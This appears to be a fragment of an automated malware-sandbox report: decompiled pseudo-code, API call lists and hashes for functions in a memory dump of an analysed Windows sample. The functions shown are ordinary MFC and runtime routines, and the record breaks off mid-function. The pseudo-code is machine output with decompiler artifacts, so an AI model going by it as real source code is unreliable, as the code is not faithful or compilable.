                  0x0041a225
                  0x0041a225
                  0x0041a18e
                  0x0041a228
                  0x0041a230
                  0x0041a238
                  0x0041a238
                  0x0041a23b
                  0x0041a23f
                  0x0041a241
                  0x0041a246
                  0x0041a249
                  0x0041a251
                  0x0041a256
                  0x0041a259
                  0x0041a25d
                  0x0041a249
                  0x0041a266
                  0x0041a272
                  0x0041a275
                  0x0041a27b
                  0x0041a280
                  0x0041a285
                  0x0041a28a
                  0x0041a293
                  0x0041a2b6
                  0x0041a2d2
                  0x0041a2d7
                  0x0041a2da
                  0x0041a2da
                  0x0041a2dd
                  0x0041a2e0
                  0x0041a2e0
                  0x0041a2e0
                  0x0041a2e3
                  0x0041a2e3
                  0x0041a2eb
                  0x0041a2f0
                  0x0041a2f4
                  0x0041a2f4
                  0x0041a2fd
                  0x0041a302
                  0x0041a086
                  0x0041a062
                  0x0041a307
                  0x0041a31c
                  0x0041a329
                  0x0041a334
                  0x0041a341
                  0x0041a346
                  0x0041a34b
                  0x0041a34d
                  0x0041a34d
                  0x0041a350
                  0x0041a352
                  0x0041a358
                  0x0041a35a
                  0x0041a35a
                  0x0041a35d
                  0x0041a366

                  APIs
                  • SetRectEmpty.USER32(?), ref: 0041A307
                    • Part of subcall function 0040B71F: _malloc.LIBCMT ref: 0040B73D
                  • GetWindowRect.USER32(?,?), ref: 0041A293
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$EmptyWindow_malloc
                  • String ID: @
                  • API String ID: 299164714-2766056989
                  • Opcode ID: 4e5ed2f8dcf97cb333e15d5cb4c4fdfa0d96c0b39d02aad18ff642e128fbc00e
                  • Instruction ID: eff8511468f97fe2a931a56d27c0a9ee7776252130c533f1be4d45fbb75153f4
                  • Opcode Fuzzy Hash: 4e5ed2f8dcf97cb333e15d5cb4c4fdfa0d96c0b39d02aad18ff642e128fbc00e
                  • Instruction Fuzzy Hash: 3CC17D71901209AFCF18CFA8C984AEEBBB5FF48314F14856AE815EB351D738AD50CB55
                  Uniqueness

                  Uniqueness Score: 23.02%

                  Function 00410FD1, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00410FD1(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t62;

				_t62 = E00420285(_t54, _t58, _t60, __eflags) + 0x7c;
				_t55 =  *((intOrPtr*)(E0042083D(_t54, _t58, _t62, __eflags) + 8));
				if(_a8 != 0 || _a12 != 0) {
					L4:
					_v8 =  *((intOrPtr*)(E00429429(__eflags)));
					_t33 = E00429429(__eflags);
					_push(_a16);
					 *_t33 = 0;
					_push(_a12);
					_push(_a8);
					_push(_a4);
					E00427E7D(_t62, 0x60, 0x5f, L"Afx:%p:%x:%p:%p:%p", _t55);
					goto L5;
				} else {
					_t69 = _a16;
					if(_a16 != 0) {
						goto L4;
					}
					_v8 =  *((intOrPtr*)(E00429429(_t69)));
					_t52 = E00429429(_t69);
					_push(_a4);
					 *_t52 = 0;
					E00427E7D(_t62, 0x60, 0x5f, L"Afx:%p:%x", _t55);
					L5:
					_t35 = E00429429(_t69);
					_t70 =  *_t35;
					if( *_t35 == 0) {
						_t36 = E00429429(__eflags);
						_t57 = _v8;
						 *_t36 = _v8;
					} else {
						E0040B759( *((intOrPtr*)(E00429429(_t70))));
						_pop(_t57);
					}
					_push( &_v48);
					_push(_t62);
					_push(_t55);
					_t38 = E0040C953(_t55, _t57, 0, _t62, _t70);
					_t71 = _t38;
					if(_t38 == 0) {
						_v48 = _a4;
						_v44 = DefWindowProcW;
						_v28 = _a16;
						_v24 = _a8;
						_v20 = _a12;
						_push( &_v48);
						_v36 = 0;
						_v40 = 0;
						_v32 = _t55;
						_v16 = 0;
						_v12 = _t62;
						if(E00410F44(_t55, _t57, 0, _t62, _t71) == 0) {
							E0041414E(_t57);
						}
					}
					return _t62;
				}
			}




























                  0x00410fe3
                  0x00410feb
                  0x00410ff3
                  0x00411028
                  0x0041102f
                  0x00411032
                  0x00411037
                  0x0041103a
                  0x0041103c
                  0x0041103f
                  0x00411042
                  0x00411050
                  0x00000000
                  0x00410ffa
                  0x00410ffa
                  0x00410ffd
                  0x00000000
                  0x00000000
                  0x00411006
                  0x00411009
                  0x0041100e
                  0x00411011
                  0x0041101e
                  0x00411058
                  0x00411058
                  0x0041105d
                  0x0041105f
                  0x00411070
                  0x00411075
                  0x00411078
                  0x00411061
                  0x00411068
                  0x0041106d
                  0x0041106d
                  0x0041107d
                  0x0041107e
                  0x0041107f
                  0x00411080
                  0x00411088
                  0x0041108a
                  0x0041108f
                  0x00411097
                  0x0041109d
                  0x004110a3
                  0x004110a9
                  0x004110af
                  0x004110b0
                  0x004110b3
                  0x004110b6
                  0x004110b9
                  0x004110bc
                  0x004110c6
                  0x004110c8
                  0x004110c8
                  0x004110c6
                  0x004110d3
                  0x004110d3

                  APIs
                  • __snwprintf_s.LIBCMT ref: 0041101E
                    • Part of subcall function 00427E7D: __vsnwprintf_s_l.LIBCMT ref: 00427E94
                  • __snwprintf_s.LIBCMT ref: 00411050
                    • Part of subcall function 00429429: __getptd_noexit.LIBCMT ref: 00429429
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __snwprintf_s$__getptd_noexit__vsnwprintf_s_l
                  • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                  • API String ID: 1951015-2801496823
                  • Opcode ID: 54a190a122e10ae168ca5fd04d243db42ad2f5ff21ef308a8c051c5547ccc26a
                  • Instruction ID: 8fd3248657fc5f0192a08c4b4491cf54d6ca9dc0f292adc27a3eb095036314c2
                  • Opcode Fuzzy Hash: 54a190a122e10ae168ca5fd04d243db42ad2f5ff21ef308a8c051c5547ccc26a
                  • Instruction Fuzzy Hash: 3A316D75E00219AFCB11EFA6D8419DE7BF4EF48354F10405BF904A7261D7388E81CBA9
                  Uniqueness

                  Uniqueness Score: 1.40%

                  Function 0040F712, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E0040F712(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E00420C0D(0xc);
				_push(E0040EA0B);
				_t26 = E0041F075(__ebx, 0x44f740, __edi, _t25, _t27);
				if(_t26 == 0) {
					E00413DD0(0x44f740);
				}
				_t29 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E00420C7F(0xc);
					return  *(_t26 + 8)(_a4, _a8, _a12, _a16);
				} else {
					_push("hhctrl.ocx");
					_t16 = E0040CBC1(_t21, 0x44f740, _t24, _t26, _t29);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpW");
						 *(_t26 + 8) = _t17;
						__eflags = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}










                  0x0040f712
                  0x0040f712
                  0x0040f712
                  0x0040f71a
                  0x0040f71f
                  0x0040f72e
                  0x0040f732
                  0x0040f734
                  0x0040f734
                  0x0040f739
                  0x0040f73d
                  0x0040f777
                  0x0040f779
                  0x00000000
                  0x0040f73f
                  0x0040f73f
                  0x0040f744
                  0x0040f74a
                  0x0040f74f
                  0x0040f75b
                  0x0040f761
                  0x0040f764
                  0x0040f766
                  0x00000000
                  0x00000000
                  0x0040f76b
                  0x0040f771
                  0x0040f771
                  0x00000000
                  0x0040f751

                  APIs
                    • Part of subcall function 00420C0D: EnterCriticalSection.KERNEL32(0044FBB0,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C47
                    • Part of subcall function 00420C0D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C59
                    • Part of subcall function 00420C0D: LeaveCriticalSection.KERNEL32(0044FBB0,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C66
                    • Part of subcall function 00420C0D: EnterCriticalSection.KERNEL32(?,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C76
                    • Part of subcall function 0041F075: __EH_prolog3_catch.LIBCMT ref: 0041F07C
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  • GetProcAddress.KERNEL32(00000000,HtmlHelpW,0040EA0B,0000000C), ref: 0040F75B
                  • FreeLibrary.KERNEL32(?), ref: 0040F76B
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                  • String ID: HtmlHelpW$hhctrl.ocx
                  • API String ID: 3274081130-3773518134
                  • Opcode ID: 0276318da37915d07d7c66a566c50b1d2222781f9b0da7236551b5ee8244edf6
                  • Instruction ID: 909925c40f10d25c4794f9c64542dff84bc4929cb96c29a27cb9ec2024979570
                  • Opcode Fuzzy Hash: 0276318da37915d07d7c66a566c50b1d2222781f9b0da7236551b5ee8244edf6
                  • Instruction Fuzzy Hash: E9012631100702EBDB312F72EC46F573A90AF04755F10843BF49AA25E1DB79D451861E
                  Uniqueness

                  Uniqueness Score: 0.53%

                  Function 00425E9F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43memoryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00425E9F(void* __ebx, void** __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t7;
				void* _t8;
				signed int _t13;
				long _t21;
				void** _t25;

				_t7 = _a8;
				_t25 = __ecx;
				_t21 = _t7 + 0x40;
				 *((intOrPtr*)(__ecx + 4)) = _t7;
				if(_t21 >= _t7) {
					_t8 = GlobalAlloc(0x40, _t21);
					 *_t25 = _t8;
					if(_t8 == 0) {
						goto L1;
					}
					_t23 = GlobalLock(_t8);
					E00402850(__ebx, _t10, _t25[1], _a4, _t25[1]);
					_t13 = E00425D35(_t23);
					asm("sbb eax, eax");
					_t25[2] =  ~_t13 + 1;
					GlobalUnlock( *_t25);
					return 1;
				}
				L1:
				return 0;
			}








                  0x00425ea4
                  0x00425ea8
                  0x00425eaa
                  0x00425ead
                  0x00425eb2
                  0x00425ebb
                  0x00425ec1
                  0x00425ec5
                  0x00000000
                  0x00000000
                  0x00425ecf
                  0x00425eda
                  0x00425ee0
                  0x00425eec
                  0x00425eef
                  0x00425ef2
                  0x00000000
                  0x00425efb
                  0x00425eb4
                  0x00000000

                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?,?,>A,004260FC,?,00000000,?,?,0041EB3E,?), ref: 00425EBB
                  • GlobalLock.KERNEL32(00000000,?,?,?,0041EB3E,?), ref: 00425EC9
                  • GlobalUnlock.KERNEL32(?,?,?,?,0041EB3E,?), ref: 00425EF2
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Global$AllocLockUnlock
                  • String ID: >A
                  • API String ID: 3972497268-3365779530
                  • Opcode ID: 94320e67f56ae1a6fe06acc3c7dd77b21b852c05708a594bee5dcca8a3e26e16
                  • Instruction ID: 74a23d57ff3a46489a0a0e84a5dd4c4c660dcbd5efac16b9910f5479af4a46cb
                  • Opcode Fuzzy Hash: 94320e67f56ae1a6fe06acc3c7dd77b21b852c05708a594bee5dcca8a3e26e16
                  • Instruction Fuzzy Hash: 33F0C2B2650211AFC711AFB4DC08D6B7BECEF58711351483AF9AAD3240EA38D8118B65
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00432116, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 65%
                  			E00432116() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x4421d8;
					_v28 =  *0x4421d0;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                  0x0043211b
                  0x00432123
                  0x0043213a
                  0x004320e6
                  0x004320ef
                  0x004320fb
                  0x004320fe
                  0x00432101
                  0x00432103
                  0x00432106
                  0x0043210b
                  0x00432115
                  0x0043210d
                  0x00432111
                  0x00432111
                  0x00432125
                  0x0043212b
                  0x00432133
                  0x00000000
                  0x00432135
                  0x00432135
                  0x00432139
                  0x00432139
                  0x00432133

                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32,004291FD), ref: 0043211B
                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0043212B
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: IsProcessorFeaturePresent$KERNEL32
                  • API String ID: 1646373207-3105848591
                  • Opcode ID: 5844c4ce1de15e9ba150b8fdf7a60626d9ecf47f5f533f0d3825c22c3fc58a24
                  • Instruction ID: 66d580759a2fd630468160295ed2e2150cd1eb365c4381919f92f88f5018e7ac
                  • Opcode Fuzzy Hash: 5844c4ce1de15e9ba150b8fdf7a60626d9ecf47f5f533f0d3825c22c3fc58a24
                  • Instruction Fuzzy Hash: CAF0B430A00A09D2EF001BA0BF0E76FBA79BB94746F920491E7D2B00D4CFB480B5D24A
                  Uniqueness

                  Uniqueness Score: 0.06%

                  Function 00437EC5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00437EC5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v0;
				signed int _v4;
				char _v40;
				char _v80;
				char* _t21;
				char* _t25;
				void* _t31;

				_t31 = __eflags;
				_push(0x44);
				E0042922B(E00439A0F, __ebx, __edi, __esi);
				E00408A20( &_v40, "invalid string position");
				_v4 = _v4 & 0x00000000;
				_t21 =  &_v80;
				E00437E3E(_t21,  &_v40);
				E00428ED5( &_v80, 0x448110);
				asm("int3");
				_push(__esi);
				_t25 = _t21;
				 *((intOrPtr*)(_t25 + 0x18)) = 0xf;
				E00408DC0(_t21, _t31, 0);
				E00408C60(__ebx, _t25, __edi, _t25, _v0, 0, 0xffffffff);
				return _t25;
			}










                  0x00437ec5
                  0x00437ec5
                  0x00437ecc
                  0x00437ed9
                  0x00437ede
                  0x00437ee6
                  0x00437ee9
                  0x00437ef7
                  0x00437efc
                  0x00437f02
                  0x00437f03
                  0x00437f07
                  0x00437f0e
                  0x00437f1c
                  0x00437f25

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00437ECC
                  • std::bad_exception::bad_exception.LIBCMT ref: 00437EE9
                    • Part of subcall function 00437E3E: std::runtime_error::runtime_error.LIBCPMT ref: 00437E49
                  • __CxxThrowException@8.LIBCMT ref: 00437EF7
                    • Part of subcall function 00428ED5: RaiseException.KERNEL32(?,?,?,?), ref: 00428F17
                  Strings
                  • invalid string position, xrefs: 00437ED1
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                  • String ID: invalid string position
                  • API String ID: 3299838469-1799206989
                  • Opcode ID: 86f948425f2300e48e03700dace2c7665851589c99c4ce9821580b47612a4d89
                  • Instruction ID: 908dc1ecdf1ded5c626d21bc0831b332bb93afbee8c4c5363dc60e2b42354bcc
                  • Opcode Fuzzy Hash: 86f948425f2300e48e03700dace2c7665851589c99c4ce9821580b47612a4d89
                  • Instruction Fuzzy Hash: BAF05E71A10228BADB10BAD5CC16FDE76689F18B24F20052FB210B61C2CEB85D0487AC
                  Uniqueness

                  Uniqueness Score: 0.10%

                  Function 0041C636, Relevance: 6.2, APIs: 4, Instructions: 180UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 37%
                  			E0041C636(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, RECT* _a8) {
				signed int _v8;
				char _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				char _v544;
				intOrPtr _v548;
				RECT* _v552;
				struct tagRECT _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t58;
				signed char _t65;
				signed int _t70;
				intOrPtr _t107;
				intOrPtr _t108;
				signed int _t113;
				signed int _t115;
				intOrPtr _t133;
				RECT* _t135;
				intOrPtr _t137;
				intOrPtr _t139;
				intOrPtr _t140;
				signed int _t145;
				void* _t146;

				_t133 = __edx;
				_t109 = __ecx;
				_t143 = _t145;
				_t146 = _t145 - 0x234;
				_t58 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t58 ^ _t145;
				_t139 = _a4;
				_t135 = _a8;
				_t107 = __ecx;
				_v548 = _t139;
				_v552 = _t135;
				if(__ecx == 0) {
					L2:
					E00413DD0(_t109);
				}
				if(_t139 == 0) {
					goto L2;
				}
				_t62 = GetWindowRect( *(_t139 + 0x20),  &_v568);
				if( *((intOrPtr*)(_t139 + 0x90)) != _t107 || _t135 != 0 && EqualRect( &_v568, _t135) == 0) {
					if( *((intOrPtr*)(_t107 + 0x98)) != 0 && ( *(_t139 + 0x88) & 0x00000040) != 0) {
						 *(_t107 + 0x84) =  *(_t107 + 0x84) | 0x00000040;
					}
					 *(_t107 + 0x84) =  *(_t107 + 0x84) & 0xfffffff9;
					_t65 =  *(_t139 + 0x84) & 0x00000006 |  *(_t107 + 0x84);
					 *(_t107 + 0x84) = _t65;
					_t157 = _t65 & 0x00000040;
					if((_t65 & 0x00000040) == 0) {
						_push(0x104);
						_push( &_v528);
						E00411F38(_t107, _t139, _t135, _t139, _t157);
						E004208C1(_t139, _t133,  *((intOrPtr*)(_t107 + 0x20)),  &_v528);
					}
					_t70 = ( *(_t139 + 0x84) ^  *(_t107 + 0x84)) & 0x0000f000 ^  *(_t139 + 0x84) | 0x00000f00;
					if( *((intOrPtr*)(_t107 + 0x98)) == 0) {
						_t71 = _t70 & 0xfffffffe;
						__eflags = _t70 & 0xfffffffe;
					} else {
						_t71 = _t70 | 0x00000001;
					}
					E00422C07(_t139, _t71);
					_t136 = E0041B7F3(_t107, GetDlgCtrlID( *(_t139 + 0x20)), 0xffffffff);
					if(_t136 > 0) {
						 *((intOrPtr*)(E00415D21(_t107, _t107 + 0x9c, _t136, _t136))) = _t139;
					}
					if(_v552 == 0) {
						__eflags = _t136 - 1;
						if(_t136 < 1) {
							_t136 = _t107 + 0x9c;
							E0041B59E(_t107 + 0x9c, _t139);
							E0041B59E(_t107 + 0x9c, 0);
						}
						_t113 =  *0x44fc24; // 0x2
						_push(0x115);
						__eflags = 0;
						_push(0);
						_push(0);
						_push( ~_t113);
						_t115 =  *0x44fc20; // 0x2
						_push( ~_t115);
						_push(0);
					} else {
						E00406B80( &_v544, _v552);
						E004144FC(_t107,  &_v544);
						if(_t136 < 1) {
							asm("cdq");
							asm("cdq");
							_push((_v532 - _v540 - _t133 >> 1) + _v540);
							_push((_v536 - _v544 - _t133 >> 1) + _v544);
							_t136 = _t146 - 0x10;
							_push(_v548);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E0041B858(_t107);
							_t139 = _v548;
						}
						_push(0x114);
						_push(_v532 - _v540);
						_push(_v536 - _v544);
						_push(_v540);
						_push(_v544);
						_push(0);
					}
					E00411EB6(_t139);
					if(E0040E20E(_t107, _t139, GetParent( *(_t139 + 0x20))) != _t107) {
						E0041B5D2(_t139, _t107);
					}
					_t118 =  *((intOrPtr*)(_t139 + 0x90));
					if( *((intOrPtr*)(_t139 + 0x90)) != 0) {
						E0041BC28(_t118, _t136, _t139, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t139 + 0x90)) = _t107;
					 *(E004159C1(_t107) + 0xe4) =  *(_t62 + 0xe4) | 0x0000000c;
				}
				_pop(_t137);
				_pop(_t140);
				_pop(_t108);
				return E00427DFF(_t62, _t108, _v8 ^ _t143, _t133, _t137, _t140);
			}






























                  0x0041c636
                  0x0041c636
                  0x0041c639
                  0x0041c63b
                  0x0041c641
                  0x0041c648
                  0x0041c64d
                  0x0041c651
                  0x0041c654
                  0x0041c656
                  0x0041c65c
                  0x0041c664
                  0x0041c666
                  0x0041c666
                  0x0041c666
                  0x0041c66d
                  0x00000000
                  0x00000000
                  0x0041c679
                  0x0041c685
                  0x0041c6ac
                  0x0041c6b7
                  0x0041c6b7
                  0x0041c6be
                  0x0041c6d4
                  0x0041c6d6
                  0x0041c6dc
                  0x0041c6de
                  0x0041c6e0
                  0x0041c6eb
                  0x0041c6ee
                  0x0041c6fd
                  0x0041c6fd
                  0x0041c719
                  0x0041c725
                  0x0041c72c
                  0x0041c72c
                  0x0041c727
                  0x0041c727
                  0x0041c727
                  0x0041c732
                  0x0041c74a
                  0x0041c74e
                  0x0041c75c
                  0x0041c75c
                  0x0041c765
                  0x0041c812
                  0x0041c815
                  0x0041c817
                  0x0041c820
                  0x0041c829
                  0x0041c829
                  0x0041c82e
                  0x0041c834
                  0x0041c839
                  0x0041c83b
                  0x0041c83c
                  0x0041c83f
                  0x0041c840
                  0x0041c848
                  0x0041c849
                  0x0041c76b
                  0x0041c777
                  0x0041c785
                  0x0041c78d
                  0x0041c7a1
                  0x0041c7ba
                  0x0041c7c5
                  0x0041c7c6
                  0x0041c7ca
                  0x0041c7cc
                  0x0041c7d2
                  0x0041c7d3
                  0x0041c7d4
                  0x0041c7d7
                  0x0041c7d8
                  0x0041c7dd
                  0x0041c7dd
                  0x0041c7ef
                  0x0041c7f4
                  0x0041c801
                  0x0041c802
                  0x0041c808
                  0x0041c80e
                  0x0041c80e
                  0x0041c84c
                  0x0041c862
                  0x0041c867
                  0x0041c867
                  0x0041c86c
                  0x0041c874
                  0x0041c87b
                  0x0041c87b
                  0x0041c882
                  0x0041c88d
                  0x0041c88d
                  0x0041c897
                  0x0041c898
                  0x0041c89b
                  0x0041c8a2

                  APIs
                  • GetWindowRect.USER32(?,?), ref: 0041C679
                  • EqualRect.USER32(?,?), ref: 0041C697
                  • GetDlgCtrlID.USER32(?), ref: 0041C73C
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                    • Part of subcall function 00411EB6: SetWindowPos.USER32(69614D43,00000000,0044B1B0,00000000,00000115,00000000,00000000), ref: 00411EDE
                  • GetParent.USER32(?), ref: 0041C854
                    • Part of subcall function 0041B5D2: SetParent.USER32(69614D43,00000000), ref: 0041B5E5
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ParentRectWindow$CtrlEqualException@8Throw
                  • String ID:
                  • API String ID: 1228987742-0
                  • Opcode ID: 30ae872368c63dfb4a6948823f63c272eb78bf086c384f51f9b22b82a1736bc9
                  • Instruction ID: 13f66cee3fcb6d317c2e126614bfb2d7dc02196cb67fed68aae7235a7cc27c22
                  • Opcode Fuzzy Hash: 30ae872368c63dfb4a6948823f63c272eb78bf086c384f51f9b22b82a1736bc9
                  • Instruction Fuzzy Hash: 6861E5716402199BCB24EF68CDC9BEA73B9BF44304F0045AEE919D7291CB78AD85CB58
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00424C4D, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                  Download Yara Rule
                  C-Code - Quality: 80%
                  			E00424C4D(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				signed int _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				void* _t80;
				void* _t84;
				intOrPtr _t85;

				_t76 = __ecx;
				_v24 = 1;
				_v20 = 1;
				_t85 = E00414924(__ecx, __ecx, _t80, _t84, __eflags, GetStockObject(0));
				_v16 = _t85;
				_v8 = E00421B6B(_t76, _t80, _t85, __eflags);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t85;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00005000;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
